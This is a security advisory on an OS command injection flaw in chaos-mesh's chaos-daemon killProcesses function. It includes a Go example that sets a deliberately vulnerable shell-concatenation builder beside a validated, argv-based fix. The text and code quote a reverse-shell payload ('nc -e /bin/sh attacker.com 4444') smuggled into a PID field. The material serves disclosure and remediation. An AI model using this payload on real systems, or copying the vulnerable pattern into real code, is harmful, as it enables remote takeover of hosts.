| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| github.com/chaos-mesh/chaos-mesh | go | < 2.7.3 | 2.7.3 |
The vulnerability is a classic OS command injection. The `killProcesses` mutation exposed by the Chaos Controller Manager takes a list of process IDs (PIDs) to kill and forwards the request to the chaos-daemon running on the target node. The daemon's `killProcesses` function builds the `kill` command by concatenating the caller-supplied PID string straight into a shell command line. Because the string is never checked to be numeric, shell metacharacters in it are interpreted: a "PID" of `123; nc -e /bin/sh attacker.com 4444` kills process 123 and then opens a reverse shell to the attacker's host. The referenced commit and pull request are a mitigation rather than a fix: they disable the control server by default, which removes the network-reachable entry point, but the command injection remains in `killProcesses` itself. The proper fix, which is not part of those commits, is to validate the input so that only positive integer PIDs reach `kill`, and to pass them as separate arguments instead of through a shell.
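The following Go program is an added example, not chaos-mesh's own daemon code: it reconstructs the vulnerable pattern the advisory describes (a PID string spliced into a `sh -c "kill ..."` line) next to a hardened builder that first parses the input as positive integers and then hands each PID to `kill` as its own argv element. The function names `buildKillCommandVulnerable`, `parsePIDs` and `buildKillCommandSafe` and the comma/space-separated PID format are assumptions made for the example; the attacker payload is the one quoted above.

```go
package main

import (
	"fmt"
	"os/exec"
	"strconv"
	"strings"
)

// buildKillCommandVulnerable mirrors the flaw described in the advisory
// (hypothetical reconstruction, not the chaos-daemon source): the caller's
// PID string is concatenated into a shell command line, so a ';' or '&&'
// in the string turns the remainder into a second command.
func buildKillCommandVulnerable(pids string) *exec.Cmd {
	return exec.Command("sh", "-c", "kill "+pids)
}

// parsePIDs is the validation step the fix needs: accept only a comma or
// space separated list of positive integers and reject anything else.
// Any shell metacharacter fails strconv.Atoi, so it never reaches a command.
func parsePIDs(raw string) ([]int, error) {
	sep := func(r rune) bool { return r == ',' || r == ' ' }
	var pids []int
	for _, field := range strings.FieldsFunc(raw, sep) {
		pid, err := strconv.Atoi(field)
		if err != nil || pid <= 0 {
			return nil, fmt.Errorf("invalid pid %q: must be a positive integer", field)
		}
		pids = append(pids, pid)
	}
	if len(pids) == 0 {
		return nil, fmt.Errorf("no pids supplied")
	}
	return pids, nil
}

// buildKillCommandSafe validates first and then passes every PID as a
// separate argv element with no shell in between. Even if validation were
// bypassed, nothing here interprets metacharacters.
func buildKillCommandSafe(raw string) (*exec.Cmd, error) {
	pids, err := parsePIDs(raw)
	if err != nil {
		return nil, err
	}
	args := make([]string, 0, len(pids))
	for _, pid := range pids {
		args = append(args, strconv.Itoa(pid))
	}
	return exec.Command("kill", args...), nil
}

func main() {
	// Constructed attacker input, taken from the advisory's example.
	payload := "123; nc -e /bin/sh attacker.com 4444"

	// The vulnerable builder happily embeds the whole payload in one shell string.
	fmt.Printf("vulnerable argv: %q\n", buildKillCommandVulnerable(payload).Args)

	// The hardened builder refuses it before any command is constructed.
	if _, err := buildKillCommandSafe(payload); err != nil {
		fmt.Println("hardened builder rejected input:", err)
	}

	// A legitimate request yields a plain argv with one element per PID.
	cmd, err := buildKillCommandSafe("123,456")
	if err != nil {
		panic(err)
	}
	fmt.Printf("hardened argv: %q\n", cmd.Args)
}
```

Printing `cmd.Args` instead of running the commands keeps the example safe to execute anywhere; the point is visible in the argv shape alone, where the vulnerable variant carries the entire payload inside a single `sh -c` argument while the hardened variant only ever produces `["kill", "123", "456"]`.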